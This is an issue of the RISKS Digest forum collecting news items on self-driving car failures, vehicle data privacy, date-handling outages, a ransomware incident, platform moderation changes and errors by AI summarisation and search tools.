• [RISKS] (no subject)

    From RISKS List Owner@risko@csl.sri.com to risks-resend@csl.sri.com on Sat Jan 11 19:16:17 2025
    Risks Digest 34.52

    RISKS-LIST: Risks-Forum Digest Saturday 11 January 2025 Volume 34 : Issue 52

    ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks) Peter G. Neumann, founder and still moderator

    ***** See last item for further information, disclaimers, caveats, etc. ***** This issue is archived at <http://www.risks.org> as
    <http://catless.ncl.ac.uk/Risks/34.52>
    The current issue can also be found at
    <http://www.csl.sri.com/users/risko/risks.txt>

    Contents:
    10 killed and dozens injured in pickup-truck attack on New Orleans crowd
    (Lauren Weinstein)
    'Fundamentally wrong': Self-driving Tesla steers Calif. tech
    founder onto train tracks (SFGate)
    Driver accidentally disconnects autopilot, crashes car
    (Lars-Henrik Eriksson)
    Driver in Las Vegas Cybertruck explosion used ChatGPT to plan
    blast, authorities say (NBC News)
    It's not just Tesla. Vehicles amass huge troves of possibly
    sensitive data. (WashPost)
    Tech allows Big Auto to evolve into Big Brother
    (LA Times via Jim Geissman)
    Wrong turn from GPS leaves car abandoned on Colorado ski run (9news.com)
    A Waymo robotaxi and a Serve delivery robot collided in run Los Angeles
    (TechCrunch)
    Waymo robotaxis can make walking across the street a game of chicken
    (The Washington Post)
    Trifecta of articles in *LA Times* about cars (Ssteve Bacher)
    LA Sheriff outage (LA Times)
    Eutelsat resolves OneWeb leap year software glitch
    after two-day outage (SpaceNews)
    Traffic lights will have a fourth color in 2025
    (ecoticias via Steve Bacher)
    FAA chief: Boeing must shift focus to safety over profit
    (LA Times)
    ARRL hit with ransomware (ARRL)
    Taiwan Suspects China of Latest Undersea Cable Attack"
    (Tom Nicholson)
    The Memecoin Shenanigans Are Just Getting Started (WiReD)
    Apple to pay $95M to settle lawsuit accusing Siri of
    eavesdropping (CBC)
    Meta Getting Rid of Fact Checkers (Clare Duff)
    Huge problems with axing fact-checkers, Meta oversight
    board says (BBC)
    Meta hosts AI chatbots of 'Hitler,' 'Jesus Christ,' Taylor Swift
    (NBC News)
    God can take Sunday off
    (NYTimes via Tom Van Vleck)
    Several items Google and Meta (Lauren Weinstein_
    AI means the end of Internet search as we've known it (Technology Review))
    Is it still 'social media' if it's overrun by AI? (CBC)
    AI Incident Database (Steve Bacher)
    Apple's AI News Summaries and Inventions (BBC)
    What real people think about Google Search today (Lauren Weinstein)
    WARNING: Google Voice is flagging LEGITIMATE robocalls from
    insurance companies to their customers in the fires as spam
    (Lauren Weinstein)
    A non-tech analogy for Google Search AI Overviews (Lauren Weinstein)
    Happy new year, compute carefully (Tom Van Vleck)
    How to understand Generative AI (Lauren Weinstein)
    Google censoring my AI criticism? (Lauren Weinstein)
    U.S. newspapers are deleting old crime stories offering
    subjects a clean slate (The Guardian)
    EU Commission Fined for Transferring User Data
    to Meta in Violation of Privacy Laws (THN)
    The Ghosts in the Spotify Machine (Liz Pelly:)
    Spotify (Rob Slade)
    Abridged info on RISKS (comp.risks)

    ----------------------------------------------------------------------

    Date: Wed, 1 Jan 2025 09:09:56 -0800
    From: Lauren Weinstein <lauren@vortex.com>
    Subject: 10 killed and dozens injured in pickup-truck attack on New Orleans
    crowd

    Driver was killed by police. It is reported that he shot at them and
    also had explosive devices. Pickup is reportedly registered to a 42
    year old man from Texas. -L

    ------------------------------

    Date: Sat, 4 Jan 2025 09:45:55 -0700
    From: geoff goodfellow <geoff@iconia.com>
    Subject: 'Fundamentally wrong': Self-driving Tesla steers Calif. tech
    founder onto train tracks (SFGate)

    Jesse Lyu trusts his Tesla’s “self-driving” technology; he’s taken it to
    work, and he’s gone on 45-minute drives without ever needing to intervene. He’s a “happy customer,” he told SFGATE. But on Thursday, his Tesla scared
    him, badly.

    Lyu, the founder and CEO of artificial intelligence gadget startup Rabbit,
    was on the 15-minute drive from his apartment to his office in downtown
    Santa Monica. He’d turned on his car’s self-driving features, called “Autopilot” and “Full Self-Driving (Supervised),” after pulling out of his
    parking garage. The pay-to-add features are meant to drive the Tesla with “minimal driver intervention,” steering, stopping and accelerating on highways and even in city traffic, according to Tesla's website. Lyu was cruising along, resting his arms on the steering wheel but letting the car direct itself, he said in a video interview Friday.

    Then, Lyu’s day took a turn for the worse. At a stoplight, his Tesla turned left onto Colorado Avenue, but it missed the lane for cars. Instead, it
    plunged onto a street-grade light rail track between the road’s vehicle traffic lanes, paved but meant solely for trains on LA’s Metro E Line. He couldn’t just move over — a low concrete barrier separates the lanes, and a fence stands on the other side.

    “It’s just f–king crazy,” he said, narrating a video he posted to X of the
    incident. “I’ve got nowhere to go. And, you can tell from behind -- the train’s right here.” (He pointed to the oncoming train, stopped about a block behind his car.) [...] https://www.sfgate.com/tech/article/tesla-fsd-jesse-lyu-train-20014242.php

    ------------------------------

    Date: Sat, 4 Jan 2025 10:25:39 +0100
    From: Lars-Henrik Eriksson <lhe@it.uu.se>
    Subject: Driver accidentally disconnects autopilot, crashes car

    A Swedish driver was convicted for reckless driving and insurance fraud
    after crashing his Tesla.

    To show off, he engaged the autopilot at a speed of 70-80 km/h and then
    moved over into the passenger seat. After a short while the car
    crashed. Fortunately no one was seriously hurt. It was initially seen as a normal car accident and his insurance compensated him for the car which was
    a total loss, but his (now ex) wife had recorded everything from the back
    seat and later turned the video over to the police.

    The police asked him if he was aware that the autopilot would disengage if
    the driver seat belt was released and he replied that he wasn't.

    The risk here is not primarily one of idiot drivers but of the increasing complexity of modern cars where the drivers don't fully understand how they behave and there is no real pressure to motivate them. In traffic, you can
    see that drivers frequently mishandle such a relatively simple thing as automatic front and rear lights.

    In aviation, pilots of larger aircraft have to take formal training to completely understand the aircraft systems. Even with smaller aircraft --
    which may have less complex systems than modern cars -- pilots are expected
    to read up on how the aircraft systems operate.

    (https://www.unt.se/nyheter/tarnsjo/artikel/filmbeviset-trodde-bilen-var-sjalvkorande-kraschade/j8ex8emj, in Swedish and behind a paywall.)

    ------------------------------

    Date: Wed, 8 Jan 2025 06:40:48 -0800
    From: Steve Bacher <sebmb1@verizon.net>
    Subject: Driver in Las Vegas Cybertruck explosion used ChatGPT to plan
    blast, authorities say (NBC News)

    NBC News (01/07/25) Tom Winter and Andrew Blankstein ; Antonio Planas

    The soldier who authorities believe blew up a Cybertruck on New Year's Day
    in front of the entrance of the Trump International Hotel in Las Vegas used artificial intelligence to guide him about how to set off the explosion, officials said Tuesday.

    Matthew Alan Livelsberger, 37, queried ChatGPT for information about how he could put together an explosive, how fast a round would need to be fired for the explosives found in the truck to go off —- not just catch fire -— and what laws he would need to get around to get the materials, law enforcement officials said.

    An OpenAI spokesperson said, "ChatGPT responded with information already publicly available on the Internet and provided warnings against harmful or illegal activities."

    https://www.nbcnews.com/news/us-news/driver-las-vegas-cybertruck-explosion-used-chatgpt-plan-blast-authorit-rcna186704

    ------------------------------

    Date: Sat, 4 Jan 2025 08:46:42 -0700
    From: geoff goodfellow <geoff@iconia.com>
    Subject: It's not just Tesla. Vehicles amass huge troves of possibly
    sensitive data. (WashPost)

    Video footage and other data collected by Tesla helped law enforcement
    quickly piece together how a Cybertruck came to explode outside the Trump International Hotel in Las Vegas on New Year's Day.

    The trove of digital evidence also served as a high-profile demonstration of how much data modern cars collect about their drivers and those around them.

    Data privacy experts say the investigation -- which has determined t= hat
    the driver, active-duty U.S. Army soldier Matthew Livelsberger, died by
    suicide before the blast -- highlights how car companies vacuum up reams of data that can clear up mysteries but also be stolen or given to third
    parties without drivers' knowledge. There are few regulations controlling
    how and when law enforcement authorities can access data in cars, and
    drivers are often unaware of the vast digital trail they leave behind.
    ``These are panopticons on wheels,'' said Albert Fox Cahn, who founded the Surveillance Technology Oversight Project, an advocacy group that argues the volume and precision of data collected can pose civil liberties concerns for people in sensitive situations, like attending protests or going to abortion clinics.

    Federal and state officials have begun to scrutinize companies' use of car
    data as evidence has emerged of its misuse. There have been reports that abusive spouses tracked partners' locations, and that insurers raised rates based on driving behavior data shared by car companies. There have also been cases in which local police departments sought video from Tesla cars that
    may have recorded a crime, or obtained warrants to tow vehicles to secure
    such footage. [...]

    https://www.msn.com/en-us/news/technology/it-s-not-just-tesla-vehicles-amass-huge-troves-of-possibly-sensitive-data/ar-AA1wX8Lo

    ------------------------------

    Date: Mon, 6 Jan 2025 07:33:49 -0800
    From: "Jim" <jgeissman@socal.rr.com>
    Subject: Tech allows Big Auto to evolve into Big Brother

    [Another on this topic]

    Your car is spying on you.

    That is one takeaway from the fast, detailed data that Tesla collected on
    the driver of one of its Cybertrucks that exploded in Las Vegas last week.

    Privacy data experts say the deep dive by Elon Musk's company was impressive but also shines a spotlight on a difficult question as vehicles become more like computers on wheels.

    Is your car company violating your privacy rights?

    "You might want law enforcement to have the data to crack down on criminals, but can anyone have access to it?" said Jodi Daniels, chief executive of the privacy consulting firm Red Clover Advisors. "Where is the line?"

    Many of the latest cars not only know where you've been and where you are going, but also often have access to your contacts, your call logs, your
    texts and other sensitive information, thanks to cellphone syncing.

    The data collected by Musk's electric car company after the Cybertruck
    packed with fireworks burst into flames in front of the Trump International Hotel proved valuable to police in helping track the driver's movements.

    http://enewspaper.latimes.com/infinity/article_share.aspx?guid=432286e7-91d3 -4e45-9e57-aa95a830767e

    ------------------------------

    Date: Tue, 7 Jan 2025 03:03:33 -0700
    From: Jim Reisert AD1C <jjreisert@alum.mit.edu>
    Subject: Wrong turn from GPS leaves car abandoned on Colorado ski
    run (9news.com)

    Melissa Reeves, 9NEWS, Updated: 10:19 PM MST January 6, 2025

    The Summit County Sheriff's Office (SCSO) posted pictures on social
    media of an abandoned car at Keystone Resort that was left behind on a
    ski run overnight.

    The sheriff's office said the driver left the car after it got stuck
    in the snow, but they left a note on the car's windshield for the
    resort and police that made it easy to find them.

    The note explained that the driver was following directions from a GPS
    as they were on their way to visit a friend who lives in nearby
    employee housing.

    https://www.9news.com/article/news/local/colorado-news/driver-makes-wrong-turn-keystone-ski-run/73-b54a9f76-451e-44b9-b5e8-014d28963a6d

    ------------------------------

    Date: Fri, 3 Jan 2025 18:45:51 -0700
    From: geoff goodfellow <geoff@iconia.com>
    Subject: A Waymo robotaxi and a Serve delivery robot collided in
    Los Angeles (TechCrunch)

    On 27 Dec 2024, a Waymo robotaxi and a Serve Robotics sidewalk delivery
    robot collided at a Los Angeles intersection, according to a video that's circulating on social media.

    The footage shows a Serve bot crossing a street in West Hollywood at night
    and trying to get onto the sidewalk. It reached the curb, backed up a little
    to correct itself and started moving toward the ramp. That's a Waymo making
    a right turn hit the little bot. [...]

    https://techcrunch.com/2024/12/31/a-waymo-robotaxi-and-a-serve-delivery-robot-collided-in-los-angeles/

    ------------------------------

    Date: Mon, 30 Dec 2024 15:24:37 -0500
    From: Gabe Goldberg <gabe@gabegold.com>
    Subject: Waymo robotaxis can make walking across the street a game of
    chicken (The Washington Post)

    On roads teeming with robotaxis, crossing the street can be harrowing -- Our tech columnist captured videos of Waymo self-driving cars failing to stop
    for him at a crosswalk. How does an AI learn how to break the law?

    https://www.washingtonpost.com/technology/2024/12/30/waymo-pedestrians-robotaxi-crosswalks/

    ------------------------------

    Date: Mon, 6 Jan 2025 06:42:54 -0800
    From: Steve Bacher <sebmb1@verizon.net>
    Subject: Trifecta of articles in *LA Times* about cars

    Los Angeles man is trapped in circling Waymo on way to airport: 'Is
    somebody playing a joke?'
    [Matthew Kruk spotted this one:
    Mike Johns boarded a driverless Waymo taxi to an airport in Scottsdale,
    Arizona, but it began spinning in circles in a parking lot. He filmed the
    moment he was trapped in the vehicle, unable to stop the car or get help.
    Johns said he almost missed his flight.
    https://www.bbc.com/news/videos/c70e2g09ng9o]

    LA tech entrepreneur Mike Johns posted a video of his call to a customer service representative for Waymo to report that the car kept turning in
    circles

    https://www.latimes.com/california/story/2025-01-05/los-angeles-man-trapped-in-circling-waymo-says-he-missed-his-flight-home

    [Jim Geissman also noted it. PGN]

    ------------------------------

    Date: Thu, 2 Jan 2025 09:21:47 -0800
    From: "Jim" <jgeissman@socal.rr.com>
    Subject: LA Sheriff outage (LA Times)

    A few hours before the ball dropped on New Year's Eve, the computer dispatch system for the Los Angeles County Sheriff's Department crashed, rendering
    all patrol car computers nearly useless and forcing deputies to handle all calls by radio, according to officials and sources in the department.

    Department leaders first learned of the problem around 8 p.m., when deputies
    at several sheriff's stations began having trouble logging onto their patrol car computers, officials told The Times in a statement.

    The department said it eventually determined its computer-aided dispatch program -- known as CAD -- was "not allowing personnel to log on with the
    new year, making the CAD inoperable."

    It's not clear how long it will take to fix the problem, but in the meantime deputies and dispatchers are handling everything old-school - using their radios instead of patrol car computers.

    "It's our own little Y2K," a deputy who was working Wednesday morning told
    The Times.

    https://www.latimes.com/california/story/2025-01-01/l-a-sheriffs-dispatch-sy stem-crashes-on-new-years-eve

    And there is more on this -- a "temporary fix". http://enewspaper.latimes.com/infinity/article_share.aspx?guid=8276009d-5b4b -4787-bece-ec72b2bbe0df

    [Also noted by Jan Wolitzky. Also, Paul Saffo noted

    If the trouble began a little after 16:00 local time (00:00 UTC), I
    would suspect the system was keeping time internally with UTC, but news
    reports say it started around 20:00. Furthermore, they say the system is
    old and needs to be replaced, which implies it's handled the end of year
    successfully many times.

    Perhaps there's a rollover issue, such as the GPS week number rollover
    that happened years ago. Since that occurred, my ca. 2000 Magellan
    receiver is years in error in its dates, though it still navigates
    without trouble. In fact, it's better than new in that respect. Rarely
    do I see its positions off by more than 10 feet. PS

    It still smells like a residual Y2K-type poor retrofix. PGN]

    ------------------------------

    Date: Thu, 2 Jan 2025 18:03:01 -0500
    From: Steve Golson <sgolson@trilobyte.com>
    Subject: Eutelsat resolves OneWeb leap year software glitch
    after two-day outage (SpaceNews)

    https://spacenews.com/eutelsat-resolves-oneweb-leap-year-software-glitch-after-two-day-outage/

    Eutelsat said Jan. 2 it has restored services across its low Earth orbit
    (LEO) OneWeb broadband network following a two-day outage.

    The software issue was caused by a failure to account for 2024 being a leap year… services were partially restored 36 hours after the disruption began
    31 Dec 2024.

    ------------------------------

    Date: Wed, 1 Jan 2025 09:14:58 -0800
    From: Steve Bacher <sebmb1@verizon.net>
    Subject: Traffic lights will have a fourth color in 2025

    It is hard not to recognize the famous red, yellow, and green traffic
    signals on roads throughout the globe. By 2025, traffic signals may have one
    of the biggest changes because one more color will be added to them. This shift aims to meet new increases by AVs and redefine the meaning of traffic management to make it safer and more effective in the future. [...]

    To further illustrate this strategy, we provide the proposed fourth color, white, which would signal to other drivers that the self-driving vehicle is managing traffic conditions. However, unlike the traditional Traffic
    signals, which inform other motorists of the behavior expected from
    autonomous vehicles at AIs, the White light informs the human drivers to
    mimic the behavior of the AVs at AIs. This system leverages the idea that
    AVs are intelligent vehicles that actively relay information and manage
    traffic information flow.

    In the case the AVs get to an intersection, they communicate with the
    traffic signals, as well as other AVs, to achieve the best flow. When AVs
    are in command, a white light informs human drivers what the self-driving vehicles intend to do. This makes it easier for human drivers to decide when
    to veer in either direction, thus eagles traffic congestion and making the
    road safer. [...]

    https://www.ecoticias.com/en/traffic-lights-fourth-color/10086/

    [Don't fire the traffic-manager programmer until you see the WHITES of his
    LIGHTS? PGN]

    ------------------------------

    Date: Mon, 6 Jan 2025 07:47:23 -0800
    From: "Jim" <jgeissman@socal.rr.com>
    Subject: FAA chief: Boeing must shift focus to safety over profit

    Boeing used to manufacture airplanes and make profit as a side-effect. Then they changed to making profits primary with airplanes as a side-effect. FAA tells them to go back to the original model.

    A year after a panel blew out of a Boeing 737 Max during a flight, the
    nation's top aviation regulator says the company needs "a fundamental
    cultural shift" to put safety and quality above profit.

    Mike Whitaker, chief of the Federal Aviation Administration, said in an
    online post Friday that his agency also has more work to do in its oversight
    of Boeing.

    Whitaker, who plans to step down in two weeks to let President-elect Donald Trump pick his own FAA administrator, looked back on his decision last
    January to ground all 737 Max jets with similar panels called door plugs. Later, the FAA put more inspectors in Boeing factories, limited production
    of new 737s and required Boeing to come up with a plan to fix manufacturing problems.

    "Boeing is working to make progress executing its comprehensive plan in the areas of safety, quality improvement and effective employee engagement and training," Whitaker said. "But this is not a one-year project. What's needed
    is a fundamental cultural shift at Boeing that's oriented around safety and quality above profits. That will require sustained effort and commitment
    from Boeing, and unwavering scrutiny on our part."

    http://enewspaper.latimes.com/infinity/article_share.aspx?guid=72e50023-50c9-470e-812e-39984c87cf63

    ------------------------------

    Date: Thu, 2 Jan 2025 18:03:09 -0500:
    From: Steve Golson <sgolson@trilobyte.com>
    Subject: ARRL hit with ransomware (ARRL)

    American Radio Relay League (ARRL), the U.S. national association for
    amateur radio, was hit with a sophisticated ransomware attack.

    https://www.arrl.org/news/arrl-it-security-incident-report-to-members

    Sometime in early May 2024, ARRL’s systems network was compromised by threat actors (TAsing everything from desktops and laptops to Windows-based and Linux-based servers. Des) using information they had purchased on the dark
    web. The TAs accessed headquarters on-site systems and most cloud-based systems. They used a wide variety of payloads affecting everything from desktops and laptops to Windows-based and Linux-based servers. Despite the
    wide variety of target configurations, the TAs seemed to have a payload that ould host and execute encryption or deletion of network-based IT assets, as well as launch demands for a ransom payment, for every system.

    This serious incident was an act of organized crime. The highly coordinated
    and execute d attack took place during the early morning hours of May
    15. That morning, as staff arrived, it was immediately apparent that ARRL
    had become the victim of an extensive and sophisticated ransomware
    attack. The FBI categorized the attack as “unique” as they hadn't yet seen this level of sophistication among the many other attacks, they have
    experience with.

    The ransom demands by the TAs, in exchange for access to their decryption tools, were exorbitant. It was clear they didn’t know, and didn’t care, that
    they had attacked a small 501(c)(3) organization with limited
    resources. Their ransom demands were dramatically weakened by the fact that they did not have access to any compromising data. It was also clear that
    they believed ARRL had extensive insurance coverage that would cover a multi-million-dollar ransom payment.

    ------------------------------

    Date: Wed, 8 Jan 2025 11:24:10 -0500 (EST)
    From: ACM TechNews <technews-editor@acm.org>
    Subject: Taiwan Suspects China of Latest Undersea Cable Attack"
    (Tom Nicholson)

    Politico Europe (01/05/25) Tom Nicholson

    Taiwanese officials suspect a Cameroon-flagged cargo ship owned by Je Yang Trading Limited of Hong Kong, led by Chinese citizen Guo Wenjie, was responsible for cutting an international undersea telecom cable on
    Jan. 3. The Shunxin-39 was intercepted by Taiwan's coast guard, but rough weather prevented an on-board investigation, and the ship continued on to a South Korean port.

    ------------------------------

    Date: Thu, 9 Jan 2025 21:11:00 -0500
    From: Gabe Goldberg <gabe@gabegold.com>
    Subject: The Memecoin Shenanigans Are Just Getting Started (WiReD)

    The market for absurdist cryptocurrencies mutated into a
    hundred-billion-dollar phenomenon in 2024. Yes, things can get even more deranged.

    Around that time, a bunch of other celebrities—from Caitlyn Jenner to Andrew Tate and Jason Derulo—were all launching their own crypto coins. The
    pile-on reflected a renewed fervor among traders for memecoins, a type of cryptocurrency that generally has no utility beyond financial speculation.

    Because memecoins do not generate revenue or cash flow, their value is
    entirely based on the attention they attract, which can fluctuate
    wildly. Though some people make a lot of money on memecoins, many others
    lose out. With a general euphoria taking hold in cryptoland as the price of bitcoin rises to historic levels above $100,000, the stage is set for yet further memecoin “degeneracy,” says Azeem Khan, cofounder of the Morph blockchain and venture partner at crypto VC firm Foresight Ventures.

    https://www.wired.com/story/memecoins-cryptocurrency-regulation

    ------------------------------

    Date: Fri, 3 Jan 2025 11:05:47 -0700
    From: Matthew Kruk <mkrukg@gmail.com>
    Subject: Apple to pay $95M to settle lawsuit accusing Siri of
    eavesdropping (CBC)

    https://www.cbc.ca/news/business/apple-siri-privacy-settlement-1.7422363

    Apple has agreed to pay $95 million US to settle a lawsuit accusing the privacy-minded company of deploying its virtual assistant Siri to eavesdrop
    on people using its iPhone and other trendy devices.

    The proposed settlement filed Tuesday in an Oakland, Calif., federal court would resolve a five-year-old lawsuit revolving around allegations that
    Apple surreptitiously activated Siri to record conversations through
    iPhones and other devices equipped with the virtual assistant for more than
    a decade.

    ------------------------------

    Date: Wed, 8 Jan 2025 11:24:10 -0500 (EST)
    From: ACM TechNews <technews-editor@acm.org>
    Subject: Meta Getting Rid of Fact Checkers (Clare Duff)

    CNN 01/07/25) Clare Duffy

    Mark Zuckerberg said Tuesday that Meta will adjust its content review
    policies on Facebook and Instagram, replacing fact checkers with
    user-generated "community notes." In doing so, Zuckerberg follows in the footsteps of Elon Musk who, after acquiring Twitter, dismantled the
    company's fact-checking teams. Said Zuckerberg, "Fact checkers have been too politically biased and have destroyed more trust than they've created."

    ------------------------------

    Date: Wed, 8 Jan 2025 07:08:55 -0700
    From: Matthew Kruk <mkrukg@gmail.com>
    Subject: Huge problems with axing fact-checkers, Meta oversight
    board says (BBC)

    https://www.bbc.com/news/articles/cjwlwlqpwx7o

    While Meta says the move -- which is being introduced in the US initially -
    is about free speech, others have suggested it is an attempt to get closer
    to the incoming Trump administration, and catch up with the access and influence enjoyed by another tech titan, Elon Musk.

    The tech journalist and author Kara Swisher told the BBC it was "the most cynical move" she had seen Mr Zuckerberg make in the "many years" she had
    been reporting on him.

    "Facebook does whatever is in its self-interest", she said.
    "He wants to kiss up to Donald Trump, and catch up with Elon Musk in that
    act."

    ------------------------------

    Date: Thu, 9 Jan 2025 14:19:32 -0500
    From: Gabe Goldberg <gabe@gabegold.com>
    Subject: Meta hosts AI chatbots of 'Hitler,' 'Jesus Christ,' Taylor Swift
    (NBC News)

    Meta says it reviews every user-generated AI chatbot, but NBC News found
    dozens that seemed to violate Meta’s policies.

    https://www.nbcnews.com/tech/social-media/meta-user-made-ai-chatbots-include-hitler-jesus-christ-rcna186206

    ------------------------------

    Date: Wed, 8 Jan 2025 08:41:43 -0500
    From: Tom Van Vleck <thvv@multicians.org>
    Subject: God can take Sunday off (NYTimes)

    from the New York Times 8 Jan 2025

    To members of his synagogue, the voice that played over the speakers of Congregation EmanuEl in Houston sounded just like Rabbi Josh Fixler's. In
    the same steady rhythm his congregation had grown used to, the voice
    delivered a sermon about what it meant to be a neighbor in the age of artificial intelligence. Then, Rabbi Fixler took to the bimah himself. "The audio you heard a moment ago may have sounded like my words," he said. "But they weren't." The recording was created by what Rabbi Fixler called "Rabbi Bot," an AI chatbot trained on his old sermons. The chatbot, created with
    the help of a data scientist, wrote the sermon, even delivering it in an
    AI version of his voice. During the rest of the service, Rabbi Fixler intermittently asked Rabbi Bot questions aloud, which it would promptly
    answer.

    Rabbi Fixler is among a growing number of religious leaders experimenting
    with AI in their work, spurring an industry of faith-based tech companies
    that offer AI tools, from assistants that can do theological research to chatbots that can help write sermons. [...] Religious leaders have used
    AI to translate their livestreamed sermons into different languages in
    real time, blasting them out to international audiences. Others have
    compared chatbots trained on tens of thousands of pages of Scripture to a
    fleet of newly trained seminary students, able to pull excerpts about
    certain topics nearly instantaneously. The report's author draws a parallel
    to previous generations' initial apprehension -- and eventual embrace -- of transformative technologies like radio, television, and the Internet. "For centuries, new technologies have changed the ways people worship, from the radio in the 1920s to television sets in the 1950s and the Internet in the 1990s," the report says. "Some proponents of AI in religious spaces have
    gone back even further, comparing AI's potential -- and fears of it -- to
    the invention of the printing press in the 15th century."

    Well, we are halfway there. Now all we need is AI-generated parishioners.

    Think of the savings in time and real estate. Church services can be over
    in microseconds. No need for church buildings, pews, altars: all virtual.
    They could repurpose churches as Amazon warehouses, patrolled by robots.

    ------------------------------

    Date: Thu, 9 Jan 2025 11:29:50 PST
    From: Peter Neumann <neumann@csl.sri.com>
    Subject: Several items Google and Meta (Lauren Weinstein_

    * Google gives a million dollars to Trump inauguration, as billionaire CEO
    Sundar goes full MAGA]

    * Changes at Meta amount to a MAGA Makeover Kevin Roose, *The New York
    Times*, 9 Jan 2025, front page of Business Section.
    [Lauren suggests META == Make Evil Trendy Again.]

    * Zuckerberg falls in line, goes fully MAGA
    Joe Garifoli, *The San Francisco Chronicle*, 9 Jan 2025

    * Google gives a million dollars to Trump inauguration, as billionaire CEO
    Sundar goes full MAGA, Lauren Weinstein, 9 Jan 2025

    [The best government money can buy? PGN]

    ------------------------------

    Date: Wed, 8 Jan 2025 08:47:42 -0800
    From: Steve Bacher <sebmb1@verizon.net>
    Subject: AI means the end of Internet search as
    we've known it (Technology Review))

    The way we navigate the web is changing, and it’s paving the way to a more AI-saturated future.

    https://www.technologyreview.com/2025/01/06/1108679/ai-generative-search-internet-breakthroughs/

    ------------------------------

    Date: Wed, 8 Jan 2025 06:47:35 -0700
    From: Matthew Kruk <mkrukg@gmail.com>
    Subject: Is it still 'social media' if it's overrun by AI? (CBC)

    https://www.cbc.ca/news/business/meta-ai-generated-characters-future-social-media-1.7424641

    Back in 2010, a 26-year-old Mark Zuckerberg shared his vision for Facebook
    -- by that point a wildly popular social network with more than 500-million users.

    "The primary thing that we focus on all day long is how to help people
    share and stay connected with their friends, family and the people in the community around them," Zuckerberg told CNBC. "That's what we care about,
    and that's why we started the company."

    Fifteen years and three billion users later, Facebook's parent company Meta
    has a new vision: characters powered by artificial intelligence existing alongside actual friends and family. Some experts caution that this could
    mark the end of social media as we know it.

    For early users of social media, platforms like Facebook and Instagram have become "about as anti-social as you can imagine," said Carmi Levy, a
    technology analyst and journalist based in London, Ont. "It's becoming increasingly difficult to connect with an actual human being."

    ------------------------------

    Date: Sat, 4 Jan 2025 08:38:38 -0800
    From: Steve Bacher <sebmb1@verizon.net>
    Subject: AI Incident Database

    This should be of interest to RISKS readers:

    Welcome to the Artificial Intelligence Incident Database
    Search over 3000 reports of AI harms
    https://incidentdatabase.ai/

    ------------------------------

    Date: Tue, 7 Jan 2025 14:32:38 -0800
    From: "Jim" <jgeissman@socal.rr.com>
    Subject: Apple's AI News Summaries and Inventions (BBC)

    https://www.bbc.com/news/articles/cge93de21n0o

    Apple is facing fresh calls to withdraw its controversial artificial intelligence (AI) feature that has generated inaccurate news alerts on its latest iPhones.

    The product is meant to summarise breaking news notifications but has in
    some instances invented entirely false claims.

    The BBC first complained to the tech giant about its journalism being misrepresented in December but Apple did not respond until Monday this week, when it said it was working to clarify that summaries were AI-generated.


    Alan Rusbridger, the former editor of the Guardian, told the BBC Apple
    needed to go further and pull a product he said was "clearly not ready."

    Mr Rusbridger, who also sits on Meta's Oversight Board that reviews appeals
    of the company's content moderation decisions, added the technology was "out
    of control" and posed a considerable misinformation risk.

    "Trust in news is low enough already without giant American corporations
    coming in and using it as a kind of test product," he told the Today
    programme, on BBC Radio Four.

    The National Union of Journalists (NUJ), one of the world's largest unions
    for journalists, said Apple "must act swiftly" and remove Apple Intelligence
    to avoid misinforming the public - echoing prior calls by journalism body Reporters Without Borders <https://www.bbc.co.uk/news/articles/cx2v778x85yo> (RSF).

    "At a time where access to accurate reporting has never been more important, the public must not be placed in a position of second-guessing the accuracy
    of news they receive," said Laura Davison, NUJ general secretary.

    The RSF also said Apple's intervention was insufficient, and has repeated
    its demand that the product is taken off-line.


    Series of errors


    The BBC complained <https://www.bbc.co.uk/news/articles/cd0elzk24dno> last month after an AI-generated summary of its headline falsely told some
    readers that Luigi Mangione, the man accused of killing UnitedHealthcare CEO Brian Thompson, had shot himself.

    On Friday, Apple's AI inaccurately summarised BBC app notifications to claim that Luke Littler had won the PDC World Darts Championship <https://www.bbc.co.uk/news/articles/cx27zwp7jpxo> hours before it began -
    and that the Spanish tennis star Rafael Nadal had come out as gay.

    This marks the first time Apple has formally responded to the concerns
    voiced by the BBC about the errors, which appear as if they are coming from within the organisation's app.

    ------------------------------

    Date: Tue, 31 Dec 2024 07:29:00 -0800
    From: Lauren Weinstein <lauren@vortex.com>
    Subject: What real people think about Google Search today

    It's both notable and deeply depressing how many nontechnical people I know
    who have unprompted told me how much they despise Google AI Overviews, which they inevitably describe as usually inaccurate and worthless, at which point they usually add how Google Search quality has declined enormously (in their own words, of course).

    Then they sometimes say something like, "Hey Lauren, don't you know people
    at Google that you could tell about how bad this is getting?"

    At which point I usually bite my tongue, which is increasingly feeling like
    a pincushion as a result.

    Don't believe the happy face metrics that Google claims -- out in

    ------------------------------

    Date: Fri, 10 Jan 2025 10:50:22 -0800
    From: Lauren Weinstein <lauren@vortex.com>
    Subject: WARNING: Google Voice is flagging LEGITIMATE robocalls from
    insurance companies to their customers in the fires as spam

    BE SURE TO CHECK YOUR SPAM FOLDERS! GOOGLE AI DOES IT AGAIN!

    ------------------------------

    Date: Tue, 31 Dec 2024 10:28:03 -0800
    From: Lauren Weinstein <lauren@vortex.com>
    Subject: A non-tech analogy for Google Search AI Overviews

    Here's a non-tech analogy to the problem (well, a problem) with Google AI Overviews:

    Let's say you go to a restaurant. Maybe they're offering free meals
    that day, maybe you're paying. Either way, several plates of
    reasonable appearing food are placed in front of you. You ask about
    the ingredients, but you only get vague answers back if any, and the
    restaurant refuses to tell you anything about the actual recipes per
    se.

    You notice a little card sticking out from under one of the plates. It
    reads:

    "Some or all of this food may be fine. Some or all of this food may
    have a bad taste. Some or all may give you food poisoning. It's up to
    you to double check this food before eating it -- we take no
    responsibility for any ill effects it may have on you."

    Still hungry?

    ------------------------------

    Date: Fri, 3 Jan 2025 09:58:24 -0500
    From: Tom Van Vleck <thvv@multicians.org>
    Subject: Happy new year, compute carefully

    Just some notes to remind you to compute carefully in 2025.

    1. In the past I recommended Gmail to people because it does some spam detection, but now Gmail is being exploited to hack people. If you get a (fake) call ostensibly from Google or (fake) notices that your Google
    account is being attacked, run. Don't click anything. https://www.forbes.com/sites/zakdoffman/2025/01/03/new-gmail-outlook-apple-mail-warning-2025-hacking-nightmare-is-coming-true/?

    2. If anybody says "now with AI," run.
    They are not giving you something wonderful for free.

    3. I have stopped using Google Chrome except for testing web page changes.
    I avoid "Chrome Browser Extensions" because they have been hacked to do bad things.

    4. 2.6 million devices have been backdoored with credential stealing
    malware. Don't be a victim. https://therecord.media/hackers-target-vpn-ai-extensions-google-chrome-malicious-updates

    ------------------------------

    Date: Sat, 4 Jan 2025 10:08:35 -0800
    From: Lauren Weinstein <lauren@vortex.com>
